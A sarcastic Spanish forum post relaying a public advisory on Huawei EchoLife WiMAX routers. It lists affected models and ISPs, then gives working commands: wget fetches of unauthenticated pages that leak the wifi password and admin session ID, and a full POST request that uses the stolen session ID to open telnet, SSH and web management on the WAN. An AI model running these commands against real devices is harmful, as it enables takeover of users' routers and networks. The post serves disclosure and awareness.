Foro Wifi-libre.com

Florilegio de brechas de seguridad de las mas chungas en los "Wimax" de Huawei

Fuentes :

• https://pierrekim.github.io/blog/2015-1 … reats.html de Pierre KIM

Ver también :

• Huawei Wimax CSRF / Information Disclosure / Manipulation @ Packet Storm

Pierre KIM vuelve a "liar-la" (ha desvelado múltiples brechas en routers totolink) pero esta vez se las ha visto con el gigante Chino Huawei.
Es que con Huawei... todo es posible. Y no lo digo como un cumplido.
Abrochar el cinturón y empieza el viaje en los bajos fondos de lo peor de lo peor a nivel de seguridad...
Solo acordate que huawei es hoy en día el líder mundial del mercado de CPE

BM6XX(x) : El wimax para pobres

Huawei tienen brechas en sus productos los mas pijos... Así que imaginate como tienen a las cosas destinadas a los pobres
Pierre KIM ha estudiado el BM626e de la empresa MTN (Costa de Marfil)
El dispositivo gasta un firmware V100R001CIVC24B010 que se encuentra en otros modelos.

Lo que no da esta lista de modelos afectados :

• EchoLife BM626e WiMAX CPE

• EchoLife BM626 WiMAX CPE

• EchoLife BM635 WiMAX CPE

• EchoLife BM632 WiMAX CPE

• EchoLife BM631a WiMAX CPE

• EchoLife BM632w WiMAX CPE

• EchoLife BM652 WiMAX CPE

   Upss...
Modelos aún vendidos y empleados en varios países...
Aquí tenéis una lista no exhaustiva de ISP/países dónde encontrar un joya de estas

• MTN CI (Cote d'Ivoire)

• Iran Cell (Iran)

• Irak Telecom (Irak)

• Libyamax (Libya)

• Globe Telecom (Philippines)

• Zain Bahrain (Bahrain)

• FreshTel (Ukraine)

Brecha uno : Obtención de información sin privilegios

Podemos pillar todo lo disponible con una sola linea de comando

wget http://192.168.1.1/check.html; less check.html

o con curl... usted elige.
En fin; se puede acceder a este pagina sin credenciales y contiene mucha información (por ejemplo el pass wifi) 

Brecha dos : robo de sesión

Si el administrador esta conectado ( o no esta desconectado del todo...)  es posible robarle fácilmente el numero de identificación para usarlo uno mismo.
Podemos ir directo - por ejemplo - en

http://192.168.1.1/static/deviceinfo.html

Se encuentra la ID de sessión de administrador - o bien SID) - en las fuentes java de la pagina
ejemplo :

sid="SID24188"

Del mismo modo que anteriormente hay un "protección" en java... que nos saltamos fácilmente gracias a nuestras herramientas de consola linux

wget http://192.168.1.1/wimax/security.html ; less security.html

brecha uno + brecha dos = Un montón de problemas

Una vez que tenemos el SID podemos...

• modificar la configuración WLAN

• la conf. WAN

• la conf. LAN

• Activar-abrir  HTTP, HTTPS, TELNET, SSH

• Jugar con el DMZ

• Redirigir puertos

• Instalar un firmware traficado

etc...

Un ejemplo ilustrativo de como proceder para liar-la gorda

Abrir y activar puertos http + https + ssh + telnet tanto en la red por cable que en la red wifi.

Haríamos así :

wget --no-cookies --header "Cookie: LoginTimes=0:LoginOverTime=0; FirstMenu=User_2; SecondMenu=User_2_1; ThirdMenu=User_2_1_0" --post-data='WWW_SID=SID24188&REDIRECT=acl.html&SERVICE=mini_httpd%2Cmini_httpsd%2Ctelnetd%2Cdropbear&SLEEP=2&HTTPD_ENABLE=1&HTTPSD_ENABLE=1&MGMT_WEB_WAN=1&MGMT_TELNET_LAN=1&MGMT_TELNET_WAN=1&MGMT_SSH_LAN=1&MGMT_SSH_WAN=1&HTTPD_PORT=80&httpslan=getValue%28&HTTPSD_PORT=443&TEL NETD_PORT=23&SSHD_PORT=22' http://192.168.1.1/basic/mtk.cgi

Modificamos asi los parámetros de mtk.cgi
Para que funcione hay que pillar el SID como indicado anteriormente y poner lo en lugar del puesto en ejemplo

Hay mas ejemplos de lineas de comandos para hacer miserias en el blog de Pierre KIM

Para cerrar este tema un gran sorpresa...
Tengo el inmenso placer de invitarles a nuestro "grande concurso de navidades".:)

Los diez primeros en responder correctamente recibirán un Wimax Huawei BM626e venido directo de Costa de Marfil. *
* Solo que tendrán que pagar ellos mismos los gastos de porte (Se hace con camellos)
* Hay que saber que hay que pasar por varias aduanas (No : Los camellos no vuelan, Son los dromedarios que vuelan...) y entonces esto aumenta el coste - varios policías por sobornar...

Empieza el juego :

Una de las personas en esta foto es el encargado del proyecto Wimax de Huawei...

            ...Encuentra-la...
     ¡ Y el Wimax Huawei es tuyo !

* indicio : Este individuo come muchos bikinis